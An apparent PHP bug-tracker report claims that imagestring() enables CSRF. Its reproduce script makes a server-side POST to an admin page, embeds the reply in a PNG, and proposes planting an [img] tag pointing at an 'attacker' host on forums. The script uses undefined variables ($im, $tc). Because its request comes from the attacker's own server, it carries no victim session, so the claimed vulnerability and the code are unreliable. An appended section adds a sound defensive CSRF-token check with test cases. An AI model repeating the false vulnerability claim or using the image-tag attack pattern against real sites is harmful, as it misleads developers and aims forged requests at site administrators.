From:             elmasterlow at gmail dot com
Operating system: all
PHP version:      5.3CVS-2009-04-09 (CVS)
PHP Bug Type:     *Graphics related
Bug description:  imagestring() csrf php version == (PHP 4, PHP 5)

Description:
------------
With this vulnerability we could do any function in PHP on an image.
In this case the vulnerability can be used to do a CSRF attack.
We can insert the img in BB tags at a random forum, for example.
I think there is any possible way to make a JS code...

Reproduce code:
---------------
<?
header('Content-Type: image/png');
$img = 'obrazek.png';
$data = array ('foo' => 'bar', 'foo2' => 'bar2');
$data = http_build_query($data);
$context_options = array ('http' => array(
'method' => 'POST',
'header'=> "Content-type: application/x-www-form-urlencoded\r\n"."Content-Length: ".strlen($data)."\r\n",
'content' => $data
));
$context = stream_context_create($context_options);
$fp = fopen('http://example.com/admin.php', 'r', false, $context);
imagestring($im, 1, 5, 5, fpassthru($fp) . $img, $tc);
imagepng($im);
imagedestroy($im);
?>

Expected result:
----------------
Insert [img]http://attacker/image.php[/img] on target site to do any
function in image.


-- 
Edit bug report at http://bugs.php.net/?id=47939&edit=1
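
A server-side check that a state-changing endpoint such as the admin.php in the reproduce code can apply, shown as an added example that is not part of the original report or of PHP itself. It rejects both the GET a browser sends when it loads an [img] URL and a POST that arrives without the administrator's session and token; the session keys `user_id` and `csrf_token` and the function names are assumptions.

```php
<?php
// Added example (not from the report): guard for a state-changing endpoint.
// The session keys 'user_id' and 'csrf_token' are assumed names.

function issue_csrf_token(array &$session): string
{
    // One random token per session, embedded in every form the site renders.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function request_is_allowed(string $method, array $session, array $post): bool
{
    // An [img] tag makes the browser send a GET; never change state on GET.
    if ($method !== 'POST') {
        return false;
    }
    // A POST sent by a remote script carries no session of the administrator.
    if (empty($session['user_id'])) {
        return false;
    }
    // A cross-site form post has the session cookie but cannot read the token.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && $expected !== ''
        && is_string($supplied) && hash_equals($expected, $supplied);
}

// Constructed requests: method, session contents, POST fields.
$admin = ['user_id' => 1];
$token = issue_csrf_token($admin);

$cases = [
    'image fetch from a logged-in browser (GET)' => ['GET', $admin, []],
    'POST from a remote script, no session'      => ['POST', [], ['foo' => 'bar', 'foo2' => 'bar2']],
    'cross-site POST, session but no token'      => ['POST', $admin, ['foo' => 'bar']],
    'form rendered by the site, token included'  => ['POST', $admin, ['csrf_token' => $token]],
];

foreach ($cases as $label => [$method, $session, $post]) {
    $verdict = request_is_allowed($method, $session, $post) ? 'allowed' : 'rejected';
    printf("%-45s %s\n", $label, $verdict);
}
```

In a real handler the arguments would be `$_SERVER['REQUEST_METHOD']`, `$_SESSION` and `$_POST` after `session_start()`.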